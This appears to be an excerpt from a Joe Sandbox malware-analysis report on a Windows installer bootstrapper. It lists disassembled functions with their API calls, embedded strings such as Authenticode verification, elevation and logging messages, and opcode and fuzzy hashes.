                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString
                                                                                                                                                                    • String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$comres.dll$detect.cpp
                                                                                                                                                                    • API String ID: 1825529933-439563586
                                                                                                                                                                    • Opcode ID: 3a3b06e5f9437c637c99dfa4b47666912d6f65be34c76c409a4d52076bbf6b06
                                                                                                                                                                    • Instruction ID: 6458cd642822726386769484102cb9d79ea30c356a79117ef783cd7257274ce7
                                                                                                                                                                    • Opcode Fuzzy Hash: 3a3b06e5f9437c637c99dfa4b47666912d6f65be34c76c409a4d52076bbf6b06
                                                                                                                                                                    • Instruction Fuzzy Hash: 8451C270600225FFDF159F64EC81FAAB76AFF05310F104269F9249A2A9C772EC60DB90
                                                                                                                                                                    Function 0091AB9E Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 140COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(00905479,000000FF,00AAC56B,E90094BA,009053BD,00000000,?,E90094BA,00000000), ref: 0091AC94
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00905479,000000FF,00AAC56B,E90094BA,009053BD,00000000,?,E90094BA,00000000), ref: 0091ACD8
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to verify expected payload against actual certificate chain., xrefs: 0091AD1E
                                                                                                                                                                    • Failed to get signer chain from authenticode certificate., xrefs: 0091AD06
                                                                                                                                                                    • cache.cpp, xrefs: 0091AC6A, 0091ACB8, 0091ACFC
                                                                                                                                                                    • Failed to get provider state from authenticode certificate., xrefs: 0091ACC2
                                                                                                                                                                    • Failed authenticode verification of payload: %ls, xrefs: 0091AC75
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                    • String ID: Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp
                                                                                                                                                                    • API String ID: 1452528299-2590768268
                                                                                                                                                                    • Opcode ID: cf12e8da13144454e5c006761439be930db2b4788a9d44d552f3d74fd923b849
                                                                                                                                                                    • Instruction ID: 43bc6c65649b4cb69ea219eb0b419c1825ceb561a55b53ae3481fe56556b3da6
                                                                                                                                                                    • Opcode Fuzzy Hash: cf12e8da13144454e5c006761439be930db2b4788a9d44d552f3d74fd923b849
                                                                                                                                                                    • Instruction Fuzzy Hash: 5F418F76E02629ABDB11DB99DC45BEEBAB8EF44721F010129FD10BB281D6709D448BE1
                                                                                                                                                                    Function 009402F8 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 123COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0094033C
                                                                                                                                                                    • GetComputerNameW.KERNEL32(?,?), ref: 00940394
                                                                                                                                                                    Strings
                                                                                                                                                                    • --- logging level: %hs ---, xrefs: 00940454
                                                                                                                                                                    • === Logging started: %ls ===, xrefs: 009403BF
                                                                                                                                                                    • Executable: %ls v%d.%d.%d.%d, xrefs: 009403F0
                                                                                                                                                                    • Computer : %ls, xrefs: 00940402
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Name$ComputerFileModule
                                                                                                                                                                    • String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
                                                                                                                                                                    • API String ID: 2577110986-3153207428
                                                                                                                                                                    • Opcode ID: badcaaa045a605de4e49aef969249c0ed77a5482ab654cb5ab439fedb741b234
                                                                                                                                                                    • Instruction ID: e5ba4433e473a4e085a6003cfead919f8a01a7669c8615b0a9e4ffa043914158
                                                                                                                                                                    • Opcode Fuzzy Hash: badcaaa045a605de4e49aef969249c0ed77a5482ab654cb5ab439fedb741b234
                                                                                                                                                                    • Instruction Fuzzy Hash: 654133B2D141189BCB209F64DD85FAA77BCEBC4304F4041AAFB09A3152E674AE849F65
                                                                                                                                                                    Function 0091D437 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 120COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000001,0094B500,?,00000001,000000FF,?,?,75C0B390,00000000,00000001,00000000,?,009174E6), ref: 0091D560
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to create pipe and cache pipe., xrefs: 0091D4BD
                                                                                                                                                                    • UX aborted elevation requirement., xrefs: 0091D475
                                                                                                                                                                    • Failed to connect to elevated child process., xrefs: 0091D549
                                                                                                                                                                    • Failed to elevate., xrefs: 0091D542
                                                                                                                                                                    • elevation.cpp, xrefs: 0091D46B
                                                                                                                                                                    • Failed to create pipe name and client token., xrefs: 0091D4A1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                    • String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
                                                                                                                                                                    • API String ID: 2962429428-3003415917
                                                                                                                                                                    • Opcode ID: ce1868c7396b95d6b3282478950583a084fd3c6ad11e208c446b575096ef2330
                                                                                                                                                                    • Instruction ID: d29aa3b78ae65db1b7b676d7bb7032d658f2924e33fc126f17b9c629d5f3840d
                                                                                                                                                                    • Opcode Fuzzy Hash: ce1868c7396b95d6b3282478950583a084fd3c6ad11e208c446b575096ef2330
                                                                                                                                                                    • Instruction Fuzzy Hash: 7F313B7274A62DBFE71696A4DC46FFBB35D9F80724F104205F904A61C1DB71AE8082D5
                                                                                                                                                                    Function 0091D24B Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 118threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,0091AD40,?,00000000,00000000), ref: 0091D2E9
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0091D2F5
                                                                                                                                                                      • Part of subcall function 0091CF25: WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,0091D365,00000000,?,?,0091C7C9,00000001,?,?,?,?,?), ref: 0091CF37
                                                                                                                                                                      • Part of subcall function 0091CF25: GetLastError.KERNEL32(?,?,0091D365,00000000,?,?,0091C7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0091CF41
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,0091C7C9,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 0091D376
                                                                                                                                                                    Strings
                                                                                                                                                                    • elevation.cpp, xrefs: 0091D319
                                                                                                                                                                    • Failed to create elevated cache thread., xrefs: 0091D323
                                                                                                                                                                    • Failed to pump messages in child process., xrefs: 0091D34D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CloseCreateHandleObjectSingleThreadWait
                                                                                                                                                                    • String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$elevation.cpp
                                                                                                                                                                    • API String ID: 3606931770-4134175193
                                                                                                                                                                    • Opcode ID: 6ccfd10128d1ede7eb23e0d3c4768988f8c9db6c4e09dd5321e9b893ffc73458
                                                                                                                                                                    • Instruction ID: 60673d529d41bae4e7b81ca4d03aca69d85f84113e057ba72e1fd19cd83cfb8d
                                                                                                                                                                    • Opcode Fuzzy Hash: 6ccfd10128d1ede7eb23e0d3c4768988f8c9db6c4e09dd5321e9b893ffc73458
                                                                                                                                                                    • Instruction Fuzzy Hash: 4841E5B6E0521DAFCB01DFA9D8859DEBBF8AF48710B10416AF918A7340E770A9418B94
                                                                                                                                                                    Function 0094159E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 117stringregistryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,00000000,00000000,BundleUpgradeCode), ref: 009415DA
                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000002,00000001,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 0094163C
                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00941648
                                                                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,00000000,00000007,?,?,00000001,?,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 0094168B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen$Value
                                                                                                                                                                    • String ID: BundleUpgradeCode$regutil.cpp
                                                                                                                                                                    • API String ID: 198323757-1648651458
                                                                                                                                                                    • Opcode ID: cb5a70eb1101a412466c78a9bf8ccb8816eb7e7e362d5d74ddc13789e8dd1dd0
                                                                                                                                                                    • Instruction ID: 09241a508a07dd094fdab326d5db77d4e8497d6aa3a29deb683593e43dab67e9
                                                                                                                                                                    • Opcode Fuzzy Hash: cb5a70eb1101a412466c78a9bf8ccb8816eb7e7e362d5d74ddc13789e8dd1dd0
                                                                                                                                                                    • Instruction Fuzzy Hash: 0841807690062AAFCB21DF98CC85EAEBBB8FF44750F060165FD11AB210D770ED519BA0
                                                                                                                                                                    Function 00940523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0096B5FC,00000000,?,?,?,00914207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009054FA,?), ref: 00940533
                                                                                                                                                                    • CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,0096B5F4,?,00914207,00000000,Setup), ref: 009405D7
                                                                                                                                                                    • GetLastError.KERNEL32(?,00914207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009054FA,?,?,?), ref: 009405E7
                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00914207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009054FA,?), ref: 00940621
                                                                                                                                                                      • Part of subcall function 00902DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00902F09
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0096B5FC,?,?,0096B5F4,?,00914207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009054FA,?), ref: 0094067A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                                                                                                                    • String ID: logutil.cpp
                                                                                                                                                                    • API String ID: 4111229724-3545173039
                                                                                                                                                                    • Opcode ID: 4f8baf5a48689398ad2d56283da834f5fc990908c44ad68a0dced84621ebc56a
                                                                                                                                                                    • Instruction ID: a13f6fc3069f2c2e0f1eb4e4025be45f7e172adb34c6c193a83ed3c0ed534993
                                                                                                                                                                    • Opcode Fuzzy Hash: 4f8baf5a48689398ad2d56283da834f5fc990908c44ad68a0dced84621ebc56a
                                                                                                                                                                    • Instruction Fuzzy Hash: 9D319231904229FFDB11AF659D45FAA766DEBC0754B020229FB02E71A0D771CD60AFA0
                                                                                                                                                                    Function 0092398D Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 009239F4
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to format property value., xrefs: 00923A7D
                                                                                                                                                                    • Failed to format property string part., xrefs: 00923A6F
                                                                                                                                                                    • %s%="%s", xrefs: 00923A27
                                                                                                                                                                    • Failed to escape string., xrefs: 00923A76
                                                                                                                                                                    • Failed to append property string part., xrefs: 00923A68
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open@16
                                                                                                                                                                    • String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
                                                                                                                                                                    • API String ID: 3613110473-515423128
                                                                                                                                                                    • Opcode ID: 63774e92892e005641b8ea10e770bcbbe53d748edc32cda46a47339cf392f5b1
                                                                                                                                                                    • Instruction ID: 663c85c09df281e8dc33115b02e17aec6914cbfb27da9e0226fb84ba581de6b1
                                                                                                                                                                    • Opcode Fuzzy Hash: 63774e92892e005641b8ea10e770bcbbe53d748edc32cda46a47339cf392f5b1
                                                                                                                                                                    • Instruction Fuzzy Hash: 5D31F272D00229FFCB15DF98EC42AAEBB68EF40714F10826AFC1162284D7789F50CB90
                                                                                                                                                                    Function 009441E5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,0094432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0091A063,00000001), ref: 00944203
                                                                                                                                                                    • GetLastError.KERNEL32(00000002,?,0094432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0091A063,00000001,000007D0,00000001,00000001,00000003), ref: 00944212
                                                                                                                                                                    • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,0094432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0091A063,00000001), ref: 009442A6
                                                                                                                                                                    • GetLastError.KERNEL32(?,0094432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0091A063,00000001,000007D0,00000001), ref: 009442B0
                                                                                                                                                                      • Part of subcall function 00944440: FindFirstFileW.KERNEL32(0092923A,?,00000100,00000000,00000000), ref: 0094447B
                                                                                                                                                                      • Part of subcall function 00944440: FindClose.KERNEL32(00000000), ref: 00944487
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ErrorFindLastMove$CloseFirst
                                                                                                                                                                    • String ID: \$fileutil.cpp
                                                                                                                                                                    • API String ID: 3479031965-1689471480
                                                                                                                                                                    • Opcode ID: d6a0cc31c681019e0188fa441e72290003c84fed2c105712b9d69ece3ae6d0a1
                                                                                                                                                                    • Instruction ID: 4519add13613abb26245c08b687efcc271ed89fe4e637c6732e36eda4b41b038
                                                                                                                                                                    • Opcode Fuzzy Hash: d6a0cc31c681019e0188fa441e72290003c84fed2c105712b9d69ece3ae6d0a1
                                                                                                                                                                    • Instruction Fuzzy Hash: 7B31C136A05226ABDB215E99CC01F6F766DFFA27A0B114129FC249B250D7B08D41A7D0
                                                                                                                                                                    Function 0090732C Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 92COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,00905932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 0090733E
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000,00000000,00000100,00000000,?,?,?,00905932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 0090741D
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get value as string for variable: %ls, xrefs: 0090740C
                                                                                                                                                                    • *****, xrefs: 009073D9, 009073E6
                                                                                                                                                                    • Failed to format value '%ls' of variable: %ls, xrefs: 009073E7
                                                                                                                                                                    • Failed to get variable: %ls, xrefs: 0090737F
                                                                                                                                                                    • Failed to get unformatted string., xrefs: 009073AE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
                                                                                                                                                                    • API String ID: 3168844106-2873099529
                                                                                                                                                                    • Opcode ID: fba2510c1d230e410f12c4f07bb6ef404345a31cc7fdb128402d6d78f89d2d36
                                                                                                                                                                    • Instruction ID: 73dddfa7fbfec175dc5647226c10d9264bac0fd3c7b9fbe27b93e7d81d141806
                                                                                                                                                                    • Opcode Fuzzy Hash: fba2510c1d230e410f12c4f07bb6ef404345a31cc7fdb128402d6d78f89d2d36
                                                                                                                                                                    • Instruction Fuzzy Hash: 8831AD32D0962AFFDF216E90CC05F9EBA69EF54331F008525FD10661A0E375BA50ABD0
                                                                                                                                                                    Function 00918DEC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 00918E37
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00918E41
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 00918EA1
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to initialize ACL., xrefs: 00918E6F
                                                                                                                                                                    • cache.cpp, xrefs: 00918E65
                                                                                                                                                                    • Failed to allocate administrator SID., xrefs: 00918E1D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesErrorFileInitializeLast
                                                                                                                                                                    • String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
                                                                                                                                                                    • API String ID: 669721577-1117388985
                                                                                                                                                                    • Opcode ID: c1c2f2775307a65968293796ab994d323f9e013c4c91a5d057d2e77cdb86d87c
                                                                                                                                                                    • Instruction ID: d1855040ca5832b511c760ab083978cee82fe5613acc9b21ea7454f8d25ebf43
                                                                                                                                                                    • Opcode Fuzzy Hash: c1c2f2775307a65968293796ab994d323f9e013c4c91a5d057d2e77cdb86d87c
                                                                                                                                                                    • Instruction Fuzzy Hash: 9C21D836B4421CB7DB21AAD59C45FDFB76DAB84B21F114025FD04BB280EA709E00A790
                                                                                                                                                                    Function 00904212 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,crypt32.dll,?,?,00914028,00000001,feclient.dll,?,00000000,?,?,?,00904B12), ref: 0090424D
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00914028,00000001,feclient.dll,?,00000000,?,?,?,00904B12,?,?,0094B488,?,00000001), ref: 00904259
                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,00914028,00000001,feclient.dll,?,00000000,?,?,?,00904B12,?), ref: 00904294
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00914028,00000001,feclient.dll,?,00000000,?,?,?,00904B12,?,?,0094B488,?,00000001), ref: 0090429E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentDirectoryErrorLast
                                                                                                                                                                    • String ID: crypt32.dll$dirutil.cpp
                                                                                                                                                                    • API String ID: 152501406-1104880720
                                                                                                                                                                    • Opcode ID: 21996307f7c044d28c03149e136b641139e7f1224713634ec32937c55e2914d0
                                                                                                                                                                    • Instruction ID: 5cae7f4a11eaab390e446ac9938bbebe1f173b28c862123180a7194e2d0f7127
                                                                                                                                                                    • Opcode Fuzzy Hash: 21996307f7c044d28c03149e136b641139e7f1224713634ec32937c55e2914d0
                                                                                                                                                                    • Instruction Fuzzy Hash: FE1196B7F41637AFD7219ADE8C44A6BBA9CAF45761B110165FF14EB290E720DC0096E0
                                                                                                                                                                    Function 00920B8E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to write during cabinet extraction., xrefs: 00920C35
                                                                                                                                                                    • Unexpected call to CabWrite()., xrefs: 00920BC1
                                                                                                                                                                    • cabextract.cpp, xrefs: 00920C2B
                                                                                                                                                                    Memory Dump Source
